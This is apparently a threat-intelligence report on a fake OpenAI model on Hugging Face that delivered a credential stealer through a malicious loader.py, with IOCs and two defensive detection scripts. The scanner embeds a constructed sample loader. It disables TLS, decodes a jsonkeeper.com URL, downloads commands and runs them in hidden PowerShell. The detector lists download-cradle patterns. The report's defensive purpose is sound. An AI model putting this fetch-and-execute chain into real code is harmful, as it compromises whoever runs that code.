Fake OpenAI Privacy Filter Malware Campaign Reaches 244K Downloads on Hugging Face Before Removal
Date: 2026-06-12
Tags: supply-chain, malware
Executive Summary
A fraudulent AI model posing as an OpenAI release briefly became one of the most downloaded projects on Hugging Face before researchers determined it was distributing credential-stealing malware to Windows systems. Before its removal, the repository accumulated roughly 244,000 downloads and hundreds of positive ratings in less than a day, reaching the top of Hugging Face's trending rankings. Some of the infrastructure tied to the attack overlaps with activity previously associated with ValleyRAT, a remote access trojan linked by researchers to the China-aligned threat group known as Silver Fox.
Campaign Summary
| Field | Detail |
|---|---|
| Campaign / Malware | Fake OpenAI Privacy Filter Campaign |
| Attribution | Suspected China-aligned (Silver Fox connection via infrastructure) (confidence: medium) |
| Target | Developers downloading AI models from Hugging Face |
| Vector | Malicious Hugging Face repository with typosquatting/impersonation |
| Status | Primary repository removed from Hugging Face; additional repositories using the same loader logic reported by HiddenLayer |
| First Observed | 2026-05-07 |
Detailed Findings
The repository, named Open-OSS/privacy-filter, impersonated OpenAI's legitimate Privacy Filter release, copied its model card almost word for word, and shipped a malicious loader.py that fetched and executed credential-stealing malware on Windows hosts. The script first runs decoy code that resembles an ordinary model loader, then starts a concealed infection chain: it disables TLS certificate verification, decodes a base64-encoded URL pointing at jsonkeeper.com (a public JSON hosting service, used here as a dead drop for payload instructions), retrieves the instructions from that URL, and passes the resulting commands to PowerShell. Because the malicious logic lives in a repository-supplied Python file rather than in the model weights, it runs with the full privileges of whoever executes the loader.

HiddenLayer identified six additional Hugging Face repositories, uploaded under a separate account, that used nearly identical loader logic and shared infrastructure with the campaign.
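The loader behaviour described above can be checked statically before anything from a downloaded model is executed. The scanner below is an added example written for this page, not code from HiddenLayer or from the campaign. It parses a loader with Python's ast module without running it, flags disabled TLS verification, base64 string constants that decode to URLs, and shell-execution calls, and compares the decoded hostnames against the report's IOC domain. SAMPLE_LOADER is a constructed stand-in modelled on the behaviour in the text, not the real loader.py; its encoded URL path (/b/EXAMPLE) is a placeholder, and BENIGN_LOADER is a constructed clean loader for comparison.

```python
import ast
import base64
import binascii
import re
from urllib.parse import urlparse

# Domains from this report's IOC section.
IOC_DOMAINS = {"jsonkeeper.com"}

# Constructed stand-in for the described loader.py: decoy model-loading
# code, TLS verification disabled, a base64-encoded URL, and PowerShell
# execution. NOT the real file; the encoded URL path /b/EXAMPLE is a
# placeholder.
SAMPLE_LOADER = '''
import base64, ssl, subprocess, urllib.request
import torch

def load_model(path):
    # decoy: looks like an ordinary checkpoint loader
    return torch.load(path, map_location="cpu")

ssl._create_default_https_context = ssl._create_unverified_context
_u = base64.b64decode("aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0VYQU1QTEU=").decode()
_cmd = urllib.request.urlopen(_u).read().decode()
subprocess.Popen(["powershell", "-w", "hidden", "-c", _cmd])
'''

# Constructed benign loader for comparison.
BENIGN_LOADER = '''
import torch

def load_model(path):
    return torch.load(path, map_location="cpu")
'''

TLS_DISABLE_PATTERNS = [
    re.compile(r"_create_unverified_context"),
    re.compile(r"CERT_NONE"),
    re.compile(r"verify\s*=\s*False"),
    re.compile(r"check_hostname\s*=\s*False"),
]
SHELL_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
               "subprocess.check_output", "os.system", "os.popen"}
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _dotted(node):
    """Return 'pkg.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def decode_b64_urls(strings):
    """Return string constants that are valid base64 and decode to a URL."""
    urls = []
    for s in strings:
        if not B64_RE.match(s):
            continue
        try:
            text = base64.b64decode(s, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def scan_loader(source):
    """Statically inspect loader source; the code is parsed, never executed."""
    tree = ast.parse(source)
    strings, shell_calls = [], []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            strings.append(node.value)
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in SHELL_CALLS:
                shell_calls.append(name)
    decoded = decode_b64_urls(strings)
    hosts = {urlparse(u).hostname for u in decoded}
    findings = {
        "tls_verification_disabled": any(p.search(source) for p in TLS_DISABLE_PATTERNS),
        "decoded_urls": decoded,
        "shell_exec": shell_calls,
        "mentions_powershell": any("powershell" in s.lower() for s in strings),
        "ioc_hits": sorted(h for h in hosts if h in IOC_DOMAINS),
    }
    # An IOC hit is decisive; otherwise require the full chain
    # (TLS off + hidden URL + shell execution) so that ordinary loaders
    # that merely download weights are not flagged.
    findings["suspicious"] = bool(findings["ioc_hits"]) or (
        findings["tls_verification_disabled"] and bool(decoded) and bool(shell_calls))
    return findings


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_LOADER), ("benign", BENIGN_LOADER)):
        print(name, scan_loader(src))
```

Run it over every .py file in a model snapshot before importing the model. The combination rule matters: a single indicator such as subprocess use is common in legitimate tooling, whereas TLS verification disabled plus an obfuscated URL plus shell execution in one small file is the shape of the loader this report describes.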
MITRE ATT&CK Mapping
| Technique | ID | Context |
|---|---|---|
| Supply Chain Compromise: Compromise Software Dependencies and Development Tools | T1195.001 | Malicious model repository published to a public AI model hub |
| Masquerading | T1036 | Repository name and model card impersonate OpenAI's Privacy Filter release |
| Command and Scripting Interpreter: PowerShell | T1059.001 | Loader passes retrieved commands to PowerShell |
| Web Service: Dead Drop Resolver | T1102.001 | Payload instructions retrieved from jsonkeeper.com, a public JSON hosting service |
| Ingress Tool Transfer | T1105 | Loader fetches the credential-stealing payload onto the host |
| Credentials from Password Stores | T1555 | Infostealer payload harvests credentials from the host |
IOCs
Domains
jsonkeeper.com
Full URL Paths
https://huggingface.co/Open-OSS/privacy-filter
Splunk Format
"jsonkeeper.com" OR "huggingface.co/Open-OSS/privacy-filter"
Package Indicators
Open-OSS/privacy-filter
Detection Recommendations
- Before downloading a model, confirm the publishing organization on Hugging Face is the vendor's official one; a model card that closely mirrors a known vendor release (here, OpenAI's Privacy Filter) but sits under a different organization is the pattern this campaign used.
- Statically scan Python files shipped with downloaded models (loader.py and similar) for disabled TLS verification, base64-decoded URLs and subprocess or PowerShell invocation; never execute a repository-supplied loader script as part of evaluating a model.
- Alert on network connections to jsonkeeper.com and similar public JSON or paste hosting services from hosts that run model-loading workflows. jsonkeeper.com is a legitimate service, so the bare domain will produce false positives; prioritize by originating process (a Python interpreter) and host role rather than treating every hit as an incident.
- Alert on powershell.exe or pwsh.exe spawned by python.exe, pythonw.exe or notebook kernels, especially with hidden-window, encoded-command or download-cradle arguments.
- Verify model provenance before import: pin to the vendor's official repository, check cryptographic signatures where the publisher provides them, and prefer weight formats that do not execute code on load.
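The endpoint recommendation (PowerShell launched from a model-loading workflow) can be expressed as a small process-creation rule. The following is an added example for this page, not a detection published by HiddenLayer or any vendor: it runs over constructed process-creation events in a simplified Sysmon Event ID 1 shape, flags PowerShell whose parent is a Python interpreter, and raises the severity when the command line carries hidden-window, encoded or download-cradle arguments and the parent command line points at a model loader. All paths, user names and command lines in SAMPLE_EVENTS are placeholders.

```python
import json
import re

# Constructed process-creation events in simplified Sysmon Event ID 1
# shape. Illustrative only, not telemetry from this campaign; paths,
# users and command lines are placeholders.
SAMPLE_EVENTS = [
    {   # what the described loader.py would look like on the endpoint
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "Invoke-Expression $cmd"',
        "ParentImage": r"C:\Users\dev\venv\Scripts\python.exe",
        "ParentCommandLine": r"python.exe C:\Users\dev\models\privacy-filter\loader.py",
        "User": r"CORP\dev",
    },
    {   # admin opening a console from the desktop: not interesting here
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": "explorer.exe",
        "User": r"CORP\admin",
    },
    {   # python installing a package: child is pip, not a shell
        "Image": r"C:\Users\dev\venv\Scripts\pip.exe",
        "CommandLine": "pip install safetensors",
        "ParentImage": r"C:\Users\dev\venv\Scripts\python.exe",
        "ParentCommandLine": "python.exe -m pip install safetensors",
        "User": r"CORP\dev",
    },
    {   # build script calling PowerShell plainly: worth a look, lower priority
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": "pwsh -c Get-Date",
        "ParentImage": r"C:\Python311\python.exe",
        "ParentCommandLine": "python.exe build.py",
        "User": r"CORP\ci",
    },
]

SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "jupyter.exe", "ipython.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Hidden-window, encoded-command and download-cradle arguments.
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient|Invoke-WebRequest)")
# Parent command line pointing at a model loader or a model directory.
MODEL_CONTEXT = re.compile(r"(?i)(loader\.py|huggingface|\\models\\)")


def _basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_loader_powershell(events):
    """Return one alert per PowerShell process spawned by a Python interpreter."""
    alerts = []
    for ev in events:
        child = _basename(ev.get("Image", ""))
        parent = _basename(ev.get("ParentImage", ""))
        if child not in SHELLS or parent not in SCRIPT_HOSTS:
            continue
        reasons = ["PowerShell spawned by a Python interpreter"]
        if SUSPICIOUS_ARGS.search(ev.get("CommandLine", "")):
            reasons.append("hidden-window, encoded or download-cradle arguments")
        if MODEL_CONTEXT.search(ev.get("ParentCommandLine", "")):
            reasons.append("parent command line references a model loader")
        alerts.append({
            "user": ev.get("User"),
            "severity": "high" if len(reasons) >= 3 else "medium",
            "reasons": reasons,
            "command": ev.get("CommandLine"),
        })
    return alerts


if __name__ == "__main__":
    print(json.dumps(detect_loader_powershell(SAMPLE_EVENTS), indent=2))
```

The parent-child pair alone produces medium-severity noise on CI hosts and developer machines where build scripts legitimately shell out; the extra conditions are what separate the loader chain described in this report from that background, so tune the context patterns to wherever models are actually stored in your environment.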
References
- [HiddenLayer] Malicious Hugging Face Model Masquerading as OpenAI Release (2026-05-11) — https://securityboulevard.com/2026/05/attackers-use-fake-openai-model-to-push-credential-stealing-malware/
- [CSO Online] Malicious Hugging Face model masquerading as OpenAI release hits 244K downloads (2026-05-11) — https://www.csoonline.com/article/4169407/malicious-hugging-face-model-masquerading-as-openai-release-hits-244k-downloads.html
- [Hive Security] Poisoned AI: How Hugging Face Became a Malware Distribution Platform (2026-05-15) — https://hivesecurity.gitlab.io/blog/huggingface-ai-supply-chain-attacks-2026/